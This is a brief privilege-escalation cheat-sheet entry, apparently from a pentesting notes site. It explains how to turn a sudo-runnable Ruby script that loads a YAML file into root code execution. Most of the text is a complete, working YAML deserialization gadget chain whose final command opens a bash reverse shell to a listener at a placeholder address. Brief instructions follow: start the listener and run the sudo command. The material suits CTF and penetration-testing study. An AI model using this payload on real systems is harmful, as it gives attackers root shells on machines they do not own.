Ruby Privilege Escalation
Ruby is an interpreted, high-level, general-purpose programming language.
Remote Code Execution with YAML
Check if the current user could run the ruby script as root privilege.
If the sample.rb contains the “File.read(’sample.yml’)”, modify the YAML file as follow:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
method_id: :resolve
Then start listener in local machine.
Now run the sudo command.